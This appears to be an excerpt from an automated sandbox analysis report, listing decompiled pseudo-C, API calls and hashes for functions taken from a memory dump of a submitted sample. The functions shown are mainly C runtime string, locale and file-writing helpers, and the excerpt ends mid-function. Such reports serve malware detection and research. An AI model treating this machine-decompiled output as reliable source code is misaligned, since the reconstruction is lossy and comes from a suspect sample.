_memset.LIBCMT ref: 004222C5

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0043C677(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E0042019C( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00422BCC( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00425208(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x0043c67f
0x0043c684
0x0043c69e
0x00000000
0x0043c69e
0x0043c686
0x0043c68b
0x00000000
0x00000000
0x0043c690
0x0043c6ad
0x0043c6b2
0x0043c6b5
0x0043c6bc
0x0043c6db
0x0043c6e2
0x0043c6e4
0x0043c728
0x0043c737
0x0043c745
0x0043c747
0x0043c757
0x0043c757
0x0043c75b
0x0043c75d
0x0043c760
0x0043c760
0x0043c760
0x0043c760
0x00000000
0x0043c766
0x0043c749
0x0043c749
0x0043c74e
0x0043c74e
0x0043c751
0x00000000
0x0043c751
0x0043c6e6
0x0043c6e9
0x0043c6ed
0x0043c716
0x0043c716
0x0043c719
0x0043c719
0x00000000
0x00000000
0x0043c71b
0x0043c71f
0x00000000
0x00000000
0x0043c721
0x0043c721
0x00000000
0x0043c721
0x0043c6ef
0x0043c6f2
0x00000000
0x00000000
0x0043c6f6
0x0043c709
0x0043c70f
0x0043c712
0x0043c714
0x00000000
0x00000000
0x00000000
0x0043c714
0x0043c6be
0x0043c6c1
0x0043c6c3
0x0043c6c8
0x0043c6c8
0x0043c6cd
0x00000000
0x0043c6cd
0x0043c692
0x0043c697
0x0043c69b
0x0043c69b
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
__isleadbyte_l.LIBCMT ref: 0043C6DB
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86
filestringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040F0E0(intOrPtr* __ecx, char _a4, intOrPtr _a24) {
				struct _OVERLAPPED* _v8;
				intOrPtr _v16;
				char _v17;
				long _v24;
				intOrPtr _v28;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t23;
				intOrPtr _t25;
				void* _t31;
				intOrPtr* _t35;
				signed int _t37;
				short* _t40;
				void* _t43;
				intOrPtr* _t46;
				CHAR* _t49;
				intOrPtr _t50;
				void* _t51;
				short* _t53;

				_push(0xffffffff);
				_push(0x4caa48);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t50;
				_t51 = _t50 - 0x20;
				_push(_t31);
				_t46 = __ecx;
				_v8 = 0;
				_t22 =  >=  ? _a4 :  &_a4;
				_t23 = CreateFileW( >=  ? _a4 :  &_a4, 0x40000000, 2, 0, 2, 0x80, 0);
				_t43 = _t23;
				if(_t43 == 0xffffffff) {
					L8:
					if(_a24 >= 8) {
						_t23 = L00422587(_a4);
					}
					 *[fs:0x0] = _v16;
					return _t23;
				}
				_t53 = _t51 - 0x18;
				_v17 = 0;
				_t40 = _t53;
				 *((intOrPtr*)(_t40 + 0x14)) = 7;
				 *(_t40 + 0x10) = 0;
				 *_t40 = 0;
				if( *_t46 != 0) {
					_t35 = _t46;
					_t31 = _t35 + 2;
					do {
						_t25 =  *_t35;
						_t35 = _t35 + 2;
					} while (_t25 != 0);
					_t37 = _t35 - _t31 >> 1;
					L6:
					_push(_t37);
					E00415C10(_t31, _t40, _t43, _t46, _t46);
					E00412840( &_v48, _v17);
					_t51 = _t53 + 0x18;
					_t49 =  >=  ? _v48 :  &_v48;
					WriteFile(_t43, _t49, lstrlenA(_t49),  &_v24, 0);
					_t23 = CloseHandle(_t43);
					if(_v28 >= 0x10) {
						_t23 = L00422587(_v48);
						_t51 = _t51 + 4;
					}
					goto L8;
				}
				_t37 = 0;
				goto L6;
			}

0x0040f0e3
0x0040f0e5
0x0040f0f0
0x0040f0f1
0x0040f0f8
0x0040f0fb
0x0040f0fe
0x0040f10b
0x0040f11b
0x0040f125
0x0040f12b
0x0040f130
0x0040f1bf
0x0040f1c3
0x0040f1c8
0x0040f1cd
0x0040f1d5
0x0040f1e0
0x0040f1e0
0x0040f136
0x0040f139
0x0040f13d
0x0040f141
0x0040f148
0x0040f14f
0x0040f155
0x0040f15b
0x0040f15d
0x0040f160
0x0040f160
0x0040f163
0x0040f166
0x0040f16d
0x0040f16f
0x0040f16f
0x0040f173
0x0040f17e
0x0040f183
0x0040f190
0x0040f1a1
0x0040f1a8
0x0040f1b2
0x0040f1b7
0x0040f1bc
0x0040f1bc
0x00000000
0x0040f1b2
0x0040f157
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
CloseHandle.KERNEL32(00000000), ref: 0040F1A8

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWritelstrlen
String ID:
API String ID: 1421093161-0
Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004409B9(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00440F28(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00440A5D(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004411DC(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E004410FD(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004409bc
0x004409c2
0x00440a35
0x00000000
0x004409c9
0x004409c9
0x004409cc
0x004409e7
0x004409ea
0x00440a0a
0x00440a1c
0x004409ec
0x004409ec
0x004409ef
0x00000000
0x004409f1
0x00440a03
0x00440a03
0x004409ef
0x00440a3a
0x00440a3e
0x004409ce
0x004409e6
0x004409e6
0x004409cc

APIs

__cftof_l.LIBCMT ref: 004409DD

Part of subcall function 004410FD: __fltout2.LIBCMT ref: 00441126

__cftog_l.LIBCMT ref: 00440A03
__cftoe_l.LIBCMT ref: 00440A35

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85

Uniqueness

Uniqueness Score: -1.00%

Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004127A0(WCHAR* __ecx, void* __edx) {
				int _v8;
				void* __ebx;
				void* __edi;
				short* _t12;
				void* _t17;
				char* _t18;
				int _t21;

				_t16 = __edx;
				_push(__ecx);
				_t12 = __ecx;
				_push(_t17);
				_t5 =  !=  ? 0xfde9 : 0;
				_v8 =  !=  ? 0xfde9 : 0;
				_t2 = lstrlenW(__ecx) + 1; // 0x1
				_t21 = _t2;
				_t18 = E00420C62(_t12, _t16, _t17, _t21);
				E0042B420(_t18, 0, _t21);
				WideCharToMultiByte(_v8, 0, _t12, 0xffffffff, _t18, _t21, 0, 0);
				return _t18;
			}

0x004127a0
0x004127a3
0x004127a7
0x004127b1
0x004127b2
0x004127b6
0x004127bf
0x004127bf
0x004127c9
0x004127ce
0x004127e4
0x004127f2

APIs

lstrlenW.KERNEL32 ref: 004127B9
_malloc.LIBCMT ref: 004127C3

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(008C0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_memset.LIBCMT ref: 004127CE
WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 2824100046-0
Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9

Uniqueness

Uniqueness Score: -1.00%

Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00414920(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20) {
				intOrPtr _v8;
				signed int _v12;
				signed int _t128;
				intOrPtr _t134;
				intOrPtr* _t137;
				intOrPtr _t140;
				signed int _t144;
				intOrPtr* _t146;
				intOrPtr _t149;
				intOrPtr _t153;
				intOrPtr _t158;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr* _t165;
				intOrPtr _t167;
				intOrPtr _t171;
				intOrPtr _t191;
				signed int _t194;
				intOrPtr* _t195;
				intOrPtr _t196;
				intOrPtr* _t200;
				signed int _t203;
				intOrPtr _t204;
				intOrPtr* _t205;
				intOrPtr _t207;
				intOrPtr* _t208;
				intOrPtr* _t210;
				signed int _t212;
				intOrPtr* _t213;
				intOrPtr* _t217;
				intOrPtr* _t221;
				intOrPtr* _t223;
				intOrPtr* _t224;
				signed int _t226;
				intOrPtr* _t231;
				void* _t232;
				intOrPtr* _t235;
				intOrPtr* _t237;
				intOrPtr* _t240;
				intOrPtr* _t241;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				intOrPtr* _t251;
				void* _t258;
				void* _t259;

				_t200 = __ecx;
				_t259 = _t258 - 8;
				_t251 = __ecx;
				_t244 = _a4;
				_t128 =  *(__ecx + 0x10);
				if(_t128 < _t244) {
					L86:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return  *((intOrPtr*)(_t200 + 0x10));
				} else {
					_t226 = _a16;
					_t200 =  *((intOrPtr*)(_a12 + 0x10));
					if(_t200 < _t226) {
						goto L86;
					} else {
						_v8 = _t128 - _t244;
						_t191 = _a8;
						_t192 =  <  ? _v8 : _t191;
						_v12 = _t200 - _t226;
						_a8 =  <  ? _v8 : _t191;
						_t200 =  <  ? _v12 : _a20;
						_t194 = _t128 - _a8;
						_v12 = _t194;
						_t195 = _a12;
						_a20 = _t200;
						if((_t128 | 0xffffffff) - _t200 <= _t194) {
							_push("string too long");
							E0044F23E(__eflags);
							goto L86;
						} else {
							_t134 = _a8;
							_t246 = _v12 + _t200;
							_v8 = _v8 - _t134;
							_v12 = _t246;
							_t247 = _a4;
							if( *(__ecx + 0x10) < _t246) {
								E00415D50(_t195, __ecx, _t247, __ecx, _v12, 0);
								_t200 = _a20;
								_t226 = _a16;
								_t134 = _a8;
							}
							if(_t251 == _t195) {
								_t196 = _a20;
								__eflags = _t196 - _t134;
								if(_t196 > _t134) {
									__eflags = _t226 - _t247;
									if(_t226 > _t247) {
										_t203 = _t247 + _t134;
										_a4 = _t203;
										__eflags = _t203 - _t226;
										if(_t203 > _t226) {
											_t204 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t204 - 8;
											if(_t204 < 8) {
												_a12 = _t251;
											} else {
												_a12 =  *_t251;
												_t196 = _a20;
											}
											__eflags = _t204 - 8;
											if(_t204 < 8) {
												_t205 = _t251;
											} else {
												_t205 =  *_t251;
											}
											E0040B600(_t205 + _t247 * 2, _a12 + _t226 * 2, _t134);
											_t207 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t207 - 8;
											if(_t207 < 8) {
												_t137 = _t251;
											} else {
												_t137 =  *_t251;
											}
											__eflags = _t207 - 8;
											if(_t207 < 8) {
												_t208 = _t251;
											} else {
												_t208 =  *_t251;
											}
											_a20 = _a4 + _a4;
											E0040B600(_t208 + (_t247 + _t196) * 2, _a4 + _a4 + _t137, _v8);
											_t140 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t140 - 8;
											if(_t140 < 8) {
												_t231 = _t251;
											} else {
												_t231 =  *_t251;
											}
											__eflags = _t140 - 8;
											if(_t140 < 8) {
												_t210 = _t251;
											} else {
												_t210 =  *_t251;
											}
											_push(_t196 - _a8);
											_t144 = _a16 + _t196;
											_t211 = _t210 + _a20;
											__eflags = _t210 + _a20;
										} else {
											_t149 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t149 - 8;
											if(_t149 < 8) {
												_t235 = _t251;
											} else {
												_t235 =  *_t251;
											}
											__eflags = _t149 - 8;
											if(_t149 < 8) {
												_t213 = _t251;
											} else {
												_t213 =  *_t251;
											}
											E0040B600(_t213 + (_t247 + _t196) * 2, _t235 + _a4 * 2, _v8);
											_t153 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t153 - 8;
											if(_t153 < 8) {
												_t231 = _t251;
											} else {
												_t231 =  *_t251;
											}
											__eflags = _t153 - 8;
											if(_t153 < 8) {
												_push(_t196);
												_t144 = _a16 - _a8 + _t196;
												_t211 = _t251 + _t247 * 2;
											} else {
												_push(_t196);
												_t144 = _a16 - _a8 + _t196;
												_t211 =  *_t251 + _t247 * 2;
											}
										}
									} else {
										_t158 =  *((intOrPtr*)(_t251 + 0x14));
										__eflags = _t158 - 8;
										if(_t158 < 8) {
											_t237 = _t251;
										} else {
											_t237 =  *_t251;
										}
										__eflags = _t158 - 8;
										if(_t158 < 8) {
											_t217 = _t251;
										} else {
											_t217 =  *_t251;
										}
										E0040B600(_t217 + (_t247 + _t196) * 2, _t237 + (_a8 + _t247) * 2, _v8);
										_t163 =  *((intOrPtr*)(_t251 + 0x14));
										__eflags = _t163 - 8;
										if(_t163 < 8) {
											_t231 = _t251;
										} else {
											_t231 =  *_t251;
										}
										__eflags = _t163 - 8;
										if(_t163 < 8) {
											_t144 = _a16;
											_push(_t196);
											_t211 = _t251 + _t247 * 2;
										} else {
											_t144 = _a16;
											_push(_t196);
											_t211 =  *_t251 + _t247 * 2;
										}
									}
									_t232 = _t231 + _t144 * 2;
								} else {
									_t164 =  *((intOrPtr*)(_t251 + 0x14));
									__eflags = _t164 - 8;
									if(_t164 < 8) {
										_t221 = _t251;
									} else {
										_t221 =  *_t251;
									}
									__eflags = _t164 - 8;
									if(_t164 < 8) {
										_t165 = _t251;
									} else {
										_t165 =  *_t251;
									}
									E0040B600(_t165 + _t247 * 2, _t221 + _t226 * 2, _t196);
									_t167 =  *((intOrPtr*)(_t251 + 0x14));
									__eflags = _t167 - 8;
									if(_t167 < 8) {
										_t240 = _t251;
									} else {
										_t240 =  *_t251;
									}
									__eflags = _t167 - 8;
									if(_t167 < 8) {
										_t223 = _t251;
									} else {
										_t223 =  *_t251;
									}
									_push(_v8);
									_t232 = _t240 + (_a8 + _t247) * 2;
									_t211 = _t223 + (_t247 + _t196) * 2;
								}
								E0040B600(_t211, _t232);
							} else {
								_t171 =  *((intOrPtr*)(_t251 + 0x14));
								if(_t171 < 8) {
									_a4 = _t251;
								} else {
									_a4 =  *_t251;
								}
								if(_t171 < 8) {
									_t241 = _t251;
								} else {
									_t241 =  *_t251;
								}
								_t172 = _v8;
								if(_v8 != 0) {
									E004205A0(_t241 + (_t247 + _t200) * 2, _a4 + (_a8 + _t247) * 2, _t172 + _t172);
									_t195 = _a12;
									_t259 = _t259 + 0xc;
								}
								if( *((intOrPtr*)(_t195 + 0x14)) >= 8) {
									_t195 =  *_t195;
								}
								if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
									_t224 = _t251;
								} else {
									_t224 =  *_t251;
								}
								_t173 = _a20;
								if(_a20 != 0) {
									E0042D8D0(_t224 + _t247 * 2, _t195 + _a16 * 2, _t173 + _t173);
								}
							}
							_t212 = _v12;
							 *(_t251 + 0x10) = _t212;
							if( *((intOrPtr*)(_t251 + 0x14)) < 8) {
								_t146 = _t251;
								__eflags = 0;
								 *((short*)(_t146 + _t212 * 2)) = 0;
								return _t146;
							} else {
								 *((short*)( *_t251 + _t212 * 2)) = 0;
								return _t251;
							}
						}
					}
				}
			}

0x00414920
0x00414923
0x00414927
0x0041492a
0x0041492d
0x00414932
0x00414c3d
0x00414c3d
0x00414c42
0x00414c47
0x00414c48
0x00414c49
0x00414c4a
0x00414c4b
0x00414c4c
0x00414c4d
0x00414c4e
0x00414c4f
0x00414c53
0x00414938
0x00414938
0x0041493f
0x00414944
0x00000000
0x0041494a
0x0041494e
0x00414951
0x00414957
0x0041495d
0x00414966
0x0041496b
0x00414972
0x00414977
0x0041497c
0x0041497f
0x00414982
0x00414c33
0x00414c38
0x00000000
0x00414988
0x0041498b
0x0041498e
0x00414990
0x00414996
0x00414999
0x0041499c
0x004149a5
0x004149aa
0x004149ad
0x004149b0
0x004149b0
0x004149b5
0x00414a36
0x00414a39
0x00414a3b
0x00414a94
0x00414a96
0x00414af9
0x00414afc
0x00414aff
0x00414b01
0x00414b6c
0x00414b6f
0x00414b72
0x00414b7e
0x00414b74
0x00414b76
0x00414b79
0x00414b79
0x00414b81
0x00414b84
0x00414b8a
0x00414b86
0x00414b86
0x00414b86
0x00414b96
0x00414b9b
0x00414ba1
0x00414ba4
0x00414baa
0x00414ba6
0x00414ba6
0x00414ba6
0x00414bac
0x00414baf
0x00414bb5
0x00414bb1
0x00414bb1
0x00414bb1
0x00414bbf
0x00414bca
0x00414bcf
0x00414bd5
0x00414bd8
0x00414bde
0x00414bda
0x00414bda
0x00414bda
0x00414be0
0x00414be3
0x00414be9
0x00414be5
0x00414be5
0x00414be5
0x00414bf0
0x00414bf4
0x00414bf6
0x00414bf6
0x00414b03
0x00414b03
0x00414b06
0x00414b09
0x00414b0f
0x00414b0b
0x00414b0b
0x00414b0b
0x00414b11
0x00414b14
0x00414b1a
0x00414b16
0x00414b16
0x00414b16
0x00414b2b
0x00414b30
0x00414b36
0x00414b39
0x00414b3f
0x00414b3b
0x00414b3b
0x00414b3b
0x00414b41
0x00414b44
0x00414b61
0x00414b62
0x00414b64
0x00414b46
0x00414b4e
0x00414b4f
0x00414b51
0x00414b51
0x00414b44
0x00414a98
0x00414a98
0x00414a9b
0x00414a9e
0x00414aa4
0x00414aa0
0x00414aa0
0x00414aa0
0x00414aa6
0x00414aa9
0x00414aaf
0x00414aab
0x00414aab
0x00414aab
0x00414ac2
0x00414ac7
0x00414acd
0x00414ad0
0x00414ad6
0x00414ad2
0x00414ad2
0x00414ad2
0x00414ad8
0x00414adb
0x00414aeb
0x00414af0
0x00414af1
0x00414add
0x00414adf
0x00414ae2
0x00414ae3
0x00414ae3
0x00414adb
0x00414bf9
0x00414a3d
0x00414a3d
0x00414a40
0x00414a43
0x00414a49
0x00414a45
0x00414a45
0x00414a45
0x00414a4b
0x00414a4e
0x00414a54
0x00414a50
0x00414a50
0x00414a50
0x00414a5d
0x00414a62
0x00414a68
0x00414a6b
0x00414a71
0x00414a6d
0x00414a6d
0x00414a6d
0x00414a73
0x00414a76
0x00414a7c
0x00414a78
0x00414a78
0x00414a78
0x00414a81
0x00414a86
0x00414a8c
0x00414a8c
0x00414bfc
0x004149b7
0x004149b7
0x004149bd
0x004149c6
0x004149bf
0x004149c1
0x004149c1
0x004149cc
0x004149d2
0x004149ce
0x004149ce
0x004149ce
0x004149d4
0x004149d9
0x004149f1
0x004149f6
0x004149f9
0x004149f9
0x00414a00
0x00414a02
0x00414a02
0x00414a08
0x00414a0e
0x00414a0a
0x00414a0a
0x00414a0a
0x00414a10
0x00414a15
0x00414a29
0x00414a2e
0x00414a15
0x00414c08
0x00414c0b
0x00414c0f
0x00414c23
0x00414c25
0x00414c29
0x00414c30
0x00414c11
0x00414c16
0x00414c20
0x00414c20
0x00414c0f
0x00414982
0x00414944

APIs

_memmove.LIBCMT ref: 004149F1

Strings

string too long, xrefs: 00414C33
invalid string position, xrefs: 00414C3D

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction ID: e15d95b7bc4e28eadeb147f52893af2b9f74cdff9e85ed34d7497a2036010d09
Opcode Fuzzy Hash: 6b6c026794a5df2e3fdb14e42bcdc4c864f1c14e00cdd800f0752a2c1f007913
Instruction Fuzzy Hash: 86C15C70704209DBCB24CF58D9C09EAB3B6FFC5304720452EE8468B655DB35ED96CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00417D50 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00417D50(signed int __ebx, intOrPtr* __ecx, signed int _a4, signed int _a8, intOrPtr* _a12, signed int _a16) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t64;
				signed int _t67;
				signed int _t69;
				signed int _t71;
				signed int _t73;
				signed int _t76;
				intOrPtr _t82;
				intOrPtr _t88;
				intOrPtr* _t96;
				intOrPtr* _t99;
				signed int _t101;
				intOrPtr _t102;
				signed int _t105;
				signed int _t109;
				signed int _t113;
				intOrPtr _t118;
				intOrPtr* _t120;
				void* _t122;
				signed int _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr _t131;
				void* _t132;
				intOrPtr* _t142;
				signed int _t144;
				void* _t151;

				_t101 = __ebx;
				_t130 = _a12;
				_t142 = __ecx;
				if(_t130 == 0) {
					L13:
					_t64 =  *(_t142 + 0x10);
					_t109 = _a4;
					__eflags = _t64 - _t109;
					if(__eflags < 0) {
						_push("invalid string position");
						E0044F26C(__eflags);
						goto L44;
					} else {
						_t122 = _t64 - _t109;
						_t109 = _a16;
						_push(_t101);
						_t105 = _a8;
						__eflags = _t122 - _t105;
						_t101 =  <  ? _t122 : _t105;
						_t73 = _t64 - _t101;
						_a8 = _t73;
						__eflags = (_t73 | 0xffffffff) - _t109 - _a8;
						if(__eflags <= 0) {
							L44:
							_push("string too long");
